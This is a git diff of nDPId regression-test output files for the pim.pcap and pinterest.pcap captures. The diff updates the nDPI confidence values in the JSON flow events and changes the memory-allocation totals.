@@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655247781655} 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655247781655,"flow_last_seen":1655247781655,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1655247781655,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655247781655,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1655247781655,"pkt":"AQBeAAANUC+oqN+8CABFwABKmKkAAAFns0PAqMvq4AAADSMAIEwBAMCoy+kAAgDSAQAAIOY+QvwAAQAAAQAHIAql5gIBAAAg5jwrAwABAAABAAcgCqXmAg=="} 
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655247781655,"flow_last_seen":1655247781655,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1655247781655,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655247781655,"flow_last_seen":1655247781655,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1655247781655,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655247782655,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1655247782655,"pkt":"AQBeAAANUC+oqN+8CABFwABKmKoAAAFns0LAqMvq4AAADSMAIFYBAMCoy+kAAgDSAQAAIOY+QvsAAQAAAQAHIAql5gIBAAAg5jwq+gABAAABAAcgCqXmAg=="} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655247783655,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1655247783655,"pkt":"AQBeAAANUC+oqN+8CABFwABKmKsAAAFns0HAqMvq4AAADSMALUsBAMCoy+kAAgDSAQAAIOY+QvoAAQAAAQAHIAql5gIBAAAg5jweBgABAAABAAcgCqXmAg=="} -00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1655247781655,"flow_last_seen":1655247790665,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1655247790665,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1655247781655,"flow_last_seen":1655247790665,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1655247790665,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} 
00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"pim.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1655247790665} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869705 bytes -~~ total memory freed........: 5869705 bytes -~~ total allocations/frees...: 118123/118123 +~~ total memory allocated....: 6003339 bytes +~~ total memory freed........: 6003339 bytes +~~ total allocations/frees...: 120885/120885 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 648 chars diff --git a/test/results/pinterest.pcap.out b/test/results/pinterest.pcap.out index 6f72c4282..71cde5cb5 100644 --- a/test/results/pinterest.pcap.out +++ b/test/results/pinterest.pcap.out 
@@ -10,9 +10,9 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605289713743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713743,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QUAAAAAoAL9IIXGAAACBAWgBAIICs+qMG0AAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713761,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuB7prDGd77q\/EGoBJXgJPPAAACBAV4AQMDAwQCCArCuSBXz6owbQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289713761,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QaawxnfgBAB+xfPAAABAQgKz6owf8K5IFc="} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.
pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R0AAAAAoAL9IJUzAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -27,10 +27,10 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsQAAAAAoAL9IJVNAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605289714171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714171,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWcPSVr2OUKdUeoBJXgLJJAAACBAV4AQMDAwQCCArCuSHy1mIgAw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605289714171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714171,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R70la9kgBAB+zY+AAABAQgK1mIgIMK5IfI="} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714180,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdpoDqe34hzBqoBJXgFKZAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714180,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGqaA6nugBAB+9aEAAABAQgK1mIgKcK5Ifs="} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 